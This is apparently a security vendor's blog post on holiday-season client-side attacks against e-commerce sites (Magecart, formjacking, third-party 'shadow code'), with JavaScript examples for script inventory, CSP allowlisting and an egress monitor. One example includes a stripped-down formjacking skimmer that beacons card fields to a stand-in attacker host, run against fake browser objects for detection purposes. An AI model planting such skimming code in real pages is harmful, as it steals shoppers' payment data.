The online holiday shopping season is well underway, with e-commerce retailers anticipating robust consumer spending: Deloitte projects that e-commerce sales will grow by 12.8% to 14.3%, year-over-year, during the 2022-2023 holiday season, reaching total sales of between $260 billion and $264 billion, according to a report from Retail Info Systems.
That’s a lot of activity on your e-commerce apps—and not all of it will be from happy holiday elves checking their shopping lists.
This is also the time of year that cyberthreat actors ramp up their activities, looking to take advantage of the surge in online holiday shopping.
Client-side attacks have become so pervasive and damaging that OWASP has compiled a new Top 10 list of client-side (browser-based) security risks. It covers many of the techniques that threaten e-commerce sites this holiday season, such as formjacking and digital skimming (the attacks associated with Magecart), along with other browser-side JavaScript risks introduced by reliance on third-party script sources.
To improve the customer journey, dynamic e-commerce websites embed third-party code in their apps to enable common functionality such as payment forms, chatbots, advertising, social sharing buttons, and tracking scripts. These JavaScript features provide out-of-the-box functionality, accelerating time to market and freeing up development resources, but they also result in “shadow code”: code that you did not write, cannot control, that changes without your awareness, and that never passes through your organization’s security reviews. Once included with a script tag, that code runs in your page’s origin with the same access to the DOM, form fields, storage and network as the code you wrote yourself. Without visibility into what runs in your environment, companies cannot detect when a script has changed or been compromised, and these scripts give threat actors a wide attack surface, allowing security incidents to occur directly in the customer’s browser without the user or merchant realizing it.
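The first step in getting that visibility is an inventory of what the page actually loads. The following is an added example, not code from the original post or from F5: it parses the script tags in a page template, separates first-party code from third-party sources, checks each third-party source against a reviewed allowlist, flags external scripts loaded without Subresource Integrity (SRI), and emits the Content Security Policy `script-src` directive that would enforce the allowlist. The page origin, vendor origins and the checkout template are all constructed for illustration.

```javascript
// Added example, not code from the original post: inventory the <script>
// elements in a page template and flag "shadow code": third-party sources that
// are not on a reviewed allowlist, and external scripts loaded without
// Subresource Integrity (SRI). The page origin, vendor origins and the sample
// template below are all constructed for illustration.

const PAGE_ORIGIN = 'https://shop.example';          // assumed first-party origin
const ALLOWED_THIRD_PARTY = new Set([                 // assumed reviewed vendors
  'https://cdn.example-pay.com',
  'https://chat.example-vendor.net',
]);

// Constructed checkout template. The integrity values are placeholders, not real hashes.
const SAMPLE_HTML = `
<html><head>
  <script src="/static/app.js" integrity="sha384-PLACEHOLDER1"></script>
  <script src="https://cdn.example-pay.com/checkout.js"
          integrity="sha384-PLACEHOLDER2" crossorigin="anonymous"></script>
  <script src="https://chat.example-vendor.net/widget.js"></script>
  <script async src="https://tracker.unknown-host.io/t.js"></script>
  <script>window.dataLayer = window.dataLayer || [];</script>
</head><body></body></html>`;

// Minimal regex-based extraction of <script ...>...</script> elements and their
// attributes. Adequate for a static template; a crawler would use a DOM parser.
function parseScriptTags(html) {
  const scripts = [];
  const tagRe = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  const attrRe = /([a-zA-Z-]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let tag;
  while ((tag = tagRe.exec(html)) !== null) {
    const attrs = {};
    let attr;
    while ((attr = attrRe.exec(tag[1])) !== null) {
      // Boolean attributes such as `async` have no value and map to ''.
      attrs[attr[1].toLowerCase()] = [attr[2], attr[3], attr[4]].find((v) => v !== undefined) || '';
    }
    scripts.push({
      src: attrs.src || null,
      integrity: attrs.integrity || null,
      inline: !attrs.src,
      body: tag[2],
    });
  }
  return scripts;
}

// Classify every script: first-party code is assumed to go through your own
// review; third-party code must be on the allowlist and should be SRI-pinned;
// inline scripts are reported because a strict CSP would have to allow them.
function auditScripts(html, pageOrigin, allowedOrigins) {
  const findings = [];
  for (const s of parseScriptTags(html)) {
    if (s.inline) {
      findings.push({ src: '(inline)', issue: 'inline-script' });
      continue;
    }
    const origin = new URL(s.src, pageOrigin).origin;   // resolves relative URLs
    if (origin === pageOrigin) continue;
    if (!allowedOrigins.has(origin)) findings.push({ src: s.src, issue: 'unapproved-third-party' });
    if (!s.integrity) findings.push({ src: s.src, issue: 'missing-sri' });
  }
  return findings;
}

// The enforcement counterpart: a CSP script-src directive that lets the browser
// refuse any script origin that is not on the list.
function buildScriptSrcDirective(allowedOrigins) {
  return `script-src 'self' ${[...allowedOrigins].join(' ')};`;
}

console.log(JSON.stringify(auditScripts(SAMPLE_HTML, PAGE_ORIGIN, ALLOWED_THIRD_PARTY), null, 2));
console.log(buildScriptSrcDirective(ALLOWED_THIRD_PARTY));
```

Two caveats a practitioner will hit immediately. SRI only helps when the vendor serves a versioned, immutable file; tag managers and many widgets rewrite their script at will, so pinning them breaks the integration and the decision becomes a risk-acceptance conversation with the vendor. And an allowlisted origin is still a single point of failure: if the vendor itself is compromised, CSP and the allowlist let the malicious version through, which is why script inventory has to be paired with monitoring of what the code does once it runs.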
Client-side attacks intercept and manipulate the user’s session in the browser: attackers deface websites, conduct phishing, present fake content, inject new forms, hijack legitimate forms so that they ask the user for a social security number or bank account details, or take over the user’s account. Captured data is typically exfiltrated to the attacker’s command-and-control server, often on a domain named to resemble a CDN or analytics provider so that the traffic blends in with legitimate third-party calls.
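What that looks like in code, and what catching it looks like, is shown by the following added example. It is not code from the original post or from F5: it pairs a stripped-down formjacking skimmer (hook the checkout form’s submit, read the card fields, beacon them to a command-and-control host) with an egress monitor that wraps the browser’s network APIs and flags or blocks calls to origins outside the page’s allowlist. It runs in Node against a constructed stand-in for `window` and for the form element, so nothing touches the network; the hostnames and card data are made up.

```javascript
// Added example, not code from the original post. It pairs a stripped-down
// formjacking skimmer of the kind the text describes with an egress monitor that
// wraps the browser's network APIs. Runs in Node against a constructed stand-in
// for `window`; no real traffic is sent and all hostnames are invented.

// Constructed stand-in for the browser globals the code uses; `log` records the
// calls that actually reach the (fake) network.
function makeFakeWindow(log) {
  return {
    location: { origin: 'https://shop.example' },
    fetch: async (url) => { log.push(`fetch ${url}`); return { ok: true }; },
    navigator: { sendBeacon: (url) => { log.push(`beacon ${url}`); return true; } },
  };
}

// Constructed stand-in for an HTMLFormElement that fires a submit event.
function makeFakeForm(fields) {
  const listeners = [];
  return {
    fields,
    addEventListener: (type, fn) => { if (type === 'submit') listeners.push(fn); },
    submit: () => listeners.forEach((fn) => fn({ type: 'submit' })),
  };
}

// (1) The attack. Real skimmers are obfuscated, wait until the card fields are
// filled, and use a host name chosen to look like a CDN or analytics service.
function installSkimmer(win, form, c2Url) {
  form.addEventListener('submit', () => {
    const stolen = JSON.stringify(form.fields);
    win.navigator.sendBeacon(c2Url, stolen);   // a beacon survives the page navigation
  });
}

// (2) The control. Wrap fetch and sendBeacon; every destination is resolved to
// an origin and compared with the allowlist. Returns the violation list so the
// caller can ship it to a reporting endpoint. In report-only mode the call is
// recorded but still allowed through.
function installEgressMonitor(win, allowedOrigins, { block = true } = {}) {
  const allowed = new Set([win.location.origin, ...allowedOrigins]);
  const violations = [];
  const permitted = (api, url) => {
    const origin = new URL(String(url), win.location.origin).origin;
    if (allowed.has(origin)) return true;
    violations.push({ api, origin, url: String(url) });
    return !block;
  };
  const nativeFetch = win.fetch;
  win.fetch = (url, init) => (permitted('fetch', url)
    ? nativeFetch.call(win, url, init)
    : Promise.reject(new Error(`egress to ${url} blocked by policy`)));
  const nativeBeacon = win.navigator.sendBeacon;
  win.navigator.sendBeacon = (url, data) =>
    permitted('sendBeacon', url) && nativeBeacon.call(win.navigator, url, data);
  return violations;
}

// Wire it together: the payment provider's call is allowed, the skimmer's
// beacon to an unknown origin is recorded (and, when blocking, refused).
function runScenario({ block = true } = {}) {
  const log = [];
  const win = makeFakeWindow(log);
  const violations = installEgressMonitor(win, ['https://cdn.example-pay.com'], { block });
  const form = makeFakeForm({ card_number: '4111111111111111', cvv: '123', name: 'A. Shopper' });
  installSkimmer(win, form, 'https://cdn-static.evil.example/collect');
  win.fetch('https://cdn.example-pay.com/tokenize', { method: 'POST' });
  form.submit();
  return { violations, log };
}

console.log(JSON.stringify(runScenario(), null, 2));
```

Treat a wrapper like this as detection telemetry rather than a boundary. It has to be the very first script on the page, and a determined skimmer can sidestep it by exfiltrating through an `Image` source, a WebSocket, a `<form action>` pointed at the attacker, or a pristine `fetch` pulled from a freshly created iframe. The enforced layer is CSP (`connect-src`, `img-src`, `form-action` and `script-src`), with `report-uri`/`report-to` providing the violation reports; the monitor’s value is that it tells you which script made the call and what it was carrying.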
There are several types of client-side attacks aimed at exploiting third-party JavaScript files.
Magecart attacks are probably the most well known. Magecart is a broader term for a range of software supply chain attacks including formjacking and digital skimming, also called e-skimming, which steal personal data (most commonly customer details and credit card information) from online web payment forms. According to F5 Labs' 2022 Application Protection Report: In Expectation of Exfiltration, formjacking attacks constituted the bulk of web exploits that led to breach disclosures.
Criminals typically leverage the captured customer data to conduct malicious acts such as identity theft or account takeover, or very often to simply harvest the information to package and sell as data dumps on the Dark Web.
Client-side attacks will continue to be a challenge for online organizations as long as criminals are able to embed malicious code into web applications, and these exploits can be particularly damaging during the holidays, when both shoppers and your cybersecurity teams already have plenty of other concerns to focus on. Given how few companies are aware of these types of attacks, and how few have set up proper defense methods to detect and thwart these exploits, attackers will continue to find success.
However, here are some best practices that you can implement to help mitigate client-side risk:
When customers log into their accounts on your e-commerce website over the holidays, they are trusting you with their sensitive personal data. Take the steps necessary to ensure the third-party scripts running in your e-commerce environment cause no harm.
Protect your company and your customers from client-side JavaScript exploits with F5 Distributed Cloud Client-Side Defense, a monitoring and mitigation solution that protects customer credentials, financial details, and personal information against Magecart, formjacking, and other client-side supply chain attacks. This SaaS-based service is quick and easy to deploy, provides immediate value, keeps your customers’ personal and financial data out of the hands of criminals, and protects against data loss that would undermine consumer confidence.
Learn more by watching the video How Merchants Can Defend Themselves against Magecart Attacks and tune into this demo of F5 Distributed Cloud Client-Side Defense.
Don’t let compromised JavaScript sources ruin the holidays for your company and customers.